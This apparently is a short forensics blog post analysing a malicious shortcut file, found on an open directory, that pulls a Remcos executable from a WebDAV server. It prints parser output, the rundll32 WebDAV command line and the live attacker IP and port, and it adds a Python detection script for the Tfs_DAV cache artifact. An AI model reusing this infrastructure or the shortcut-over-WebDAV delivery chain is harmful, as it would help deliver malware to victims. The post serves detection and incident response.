Today I Learned - WebDAV Cache

Introduction

User @karol_paciorek recently tweeted about an open directory containing malware, depicted in Figure 1. You can find the original post here:

Figure 1: opendir: 216.9.224[.]58:5555

Along with the MS_calendar.lnk file mentioned in the tweet from @karol_paciorek, there are additional files publicly available on that server.

LNK Analysis

We will examine the LNK file schedule.lnk (MD5: 62d5389d43931237e9d3d1aa77c87483), located in the same directory as the MS_calendar.lnk file. To analyze it, we will use LECmd.exe, a handy tool developed by Eric Zimmerman.

C:\Users\malmoeb\Downloads>LECmd.exe -f schedule.lnk
LECmd version 1.5.0.0

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/LECmd

Command line: -f schedule.lnk

Processing C:\Users\malmoeb\Downloads\schedule.lnk

Source file: C:\Users\malmoeb\Downloads\schedule.lnk
  Source created:  2024-08-06 07:51:47
  Source modified: 2024-08-06 07:51:47
  Source accessed: 2024-08-06 07:52:08

--- Header ---
  Target created:  2024-08-04 23:17:22
  Target modified: 2024-07-01 03:33:05
  Target accessed: 2024-07-01 03:33:05

  File size (bytes): 101,888
  Flags: HasLinkInfo, HasRelativePath, HasWorkingDir, HasIconLocation, IsUnicode, HasExpString, EnableTargetMetadata
  File attributes: FileAttributeArchive
  Icon index: 0
  Show window: SwShowminnoactive (Display the window as minimized without activating it.)

Relative Path: .\Erlianaw.exe
Working Directory: \\216.9.224.58@5555\DavWWWRoot\files
Icon Location: \\216.9.224.58@5555\DavWWWRoot\files\fold.ico

--- Link information ---
Flags: CommonNetworkRelativeLinkAndPathSuffix

  Network share information
    Share name: \\216.9.224.58@5555\DAVWWWROOT
    Provider type: WnncNetDav
    Share flags: ValidNetType

  Common path: files\Erlianaw.exe

--- Extra blocks information ---

>> Property store data block (Format: GUID\ID Description ==> Value)
   dabd30ed-0043-4789-a7f8-d013a4736622\100    Item Folder Path Display Narrow     ==> files (\\216.9.224.58@5555\DavWWWRoot)
   b725f130-47ef-101a-a5f1-02608c9eebac\10     Item Name Display                   ==> Erlianaw.exe
   b725f130-47ef-101a-a5f1-02608c9eebac\15     Date Created                        ==> 08/04/2024 23:17:22
   b725f130-47ef-101a-a5f1-02608c9eebac\12     Size                                ==> 101888
   b725f130-47ef-101a-a5f1-02608c9eebac\4      Item Type Text                      ==> Application
   b725f130-47ef-101a-a5f1-02608c9eebac\14     Date Modified                       ==> 07/01/2024 03:33:05
   28636aa6-953d-11d2-b5d6-00c04fd918d0\30     Parsing Path                        ==> \\216.9.224.58@5555\DavWWWRoot\files\Erlianaw.exe

By analyzing this LNK file (the full output from LECmd.exe is depicted above), we can identify the next stage in the infection chain that would be downloaded to the victim host upon executing this LNK file:

Relative Path: .\Erlianaw.exe
Working Directory: \\216.9.224.58@5555\DavWWWRoot\files

WebDAV Connection

As already explained in an earlier blog post (Abusing the “search-ms” URI protocol handler), WebDAV connections are carried out via a DLL that is started with rundll32.exe:

CommandLine: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 216.9.224.58@5555 http://216.9.224.58:5555/

The user agent utilized for this WebDAV connection is noteworthy:

Figure 2: User-Agent for the WebDAV connection

Didier Stevens described and investigated this user agent years ago. If your organization proxies its outbound traffic, you might want to monitor for this user agent.

Sysmon

While analyzing the Sysmon logs, I stumbled upon something interesting.

Figure 3: Event 11 - Sysmon File Create

File created:

TargetFilename: C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\TfsStore\Tfs_DAV\{CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe

What the heck is this \TfsStore\Tfs_DAV\ directory, and the executable {CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe in it? As it turns out, these files can provide evidence of files retrieved from remote WebDAV server(s) to the local system, at least temporarily.

Tfs_DAV

Figure 4: Tfs_DAV folder

And sure enough, the MD5 of the file {CACAF1F7-CE7C-4CA2-B9E3-ABBC9F6E965D}.exe maps to a file on VirusTotal named Erlianaw.exe, the filename we saw earlier during the analysis of the LNK file.
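To turn the two observations above (the rundll32 davclnt.dll,DavSetCookie command line from the WebDAV Connection section and the Tfs_DAV file creation from the Sysmon section) into a simple detection, here is an added Python example that is not part of the original post. It runs over constructed Sysmon-style events (Event 1 process creation and Event 11 file create), extracts the WebDAV host from DavSetCookie, flags files written to the Tfs_DAV cache, and attributes each cache write to the most recent mount within a time window; the GUID file name in the sample is a placeholder.

```python
import re
from datetime import datetime, timedelta

# Constructed Sysmon-style events (not taken from the original post). The WebDAV
# host is the one from the analysed LNK file; the GUID file name is a placeholder.
EVENTS = [
    {"EventID": 1, "UtcTime": "2024-08-06 07:52:10",
     "CommandLine": "rundll32.exe C:\\Windows\\system32\\davclnt.dll,DavSetCookie "
                    "216.9.224.58@5555 http://216.9.224.58:5555/"},
    {"EventID": 11, "UtcTime": "2024-08-06 07:52:14",
     "TargetFilename": "C:\\Windows\\SERVIC~1\\LOCALS~1\\AppData\\Local\\Temp\\TfsStore"
                       "\\Tfs_DAV\\{11111111-2222-3333-4444-555555555555}.exe"},
    {"EventID": 11, "UtcTime": "2024-08-06 08:30:00",
     "TargetFilename": "C:\\Users\\alice\\Documents\\notes.txt"},
]

# rundll32 davclnt.dll,DavSetCookie <host@port> <url>: the first argument is the share host
DAVSETCOOKIE_RE = re.compile(r"davclnt\.dll,DavSetCookie\s+(\S+)", re.IGNORECASE)
# Files the WebDAV mini-redirector caches locally under TfsStore\Tfs_DAV
TFS_DAV_RE = re.compile(r"\\TfsStore\\Tfs_DAV\\([^\\]+)$", re.IGNORECASE)

def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def webdav_mounts(events):
    """(time, host) for every DavSetCookie invocation found in Event 1 command lines."""
    hits = []
    for e in events:
        m = DAVSETCOOKIE_RE.search(e.get("CommandLine", "")) if e["EventID"] == 1 else None
        if m:
            hits.append((parse_time(e["UtcTime"]), m.group(1)))
    return hits

def tfs_dav_files(events):
    """(time, file name) for every Event 11 file create inside the Tfs_DAV cache."""
    hits = []
    for e in events:
        m = TFS_DAV_RE.search(e.get("TargetFilename", "")) if e["EventID"] == 11 else None
        if m:
            hits.append((parse_time(e["UtcTime"]), m.group(1)))
    return hits

def correlate(events, window_seconds=60):
    """Attribute each Tfs_DAV cache write to the last WebDAV mount within the window (host None if none)."""
    mounts = webdav_mounts(events)
    alerts = []
    for t, name in tfs_dav_files(events):
        recent = [h for (mt, h) in mounts if timedelta(0) <= t - mt <= timedelta(seconds=window_seconds)]
        alerts.append({"file": name, "host": recent[-1] if recent else None, "time": t.isoformat()})
    return alerts
```

Calling correlate(EVENTS) on the sample yields one alert tying the cached GUID-named executable to the 216.9.224.58@5555 share; the unrelated notes.txt write is ignored.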

Figure 5: Erlianaw.exe - Remcos on VirusTotal

Late to the party

It looks like I’m late to the party, though :) @enigma0x3 already discussed in 2017 that files executed via WebDAV are copied locally to the TfsStore\Tfs_DAV folder.

And, another interesting fact: @SBousseaden mentioned that .url files in the AppData\Local\Temp\TfsStore\Tfs_DAV cache folder might contain the URL the downloaded files came from (referencing CVE-2024-21412).

Once again, standing on the shoulders of giants.


What I learned today: Short blog posts about novel information for me.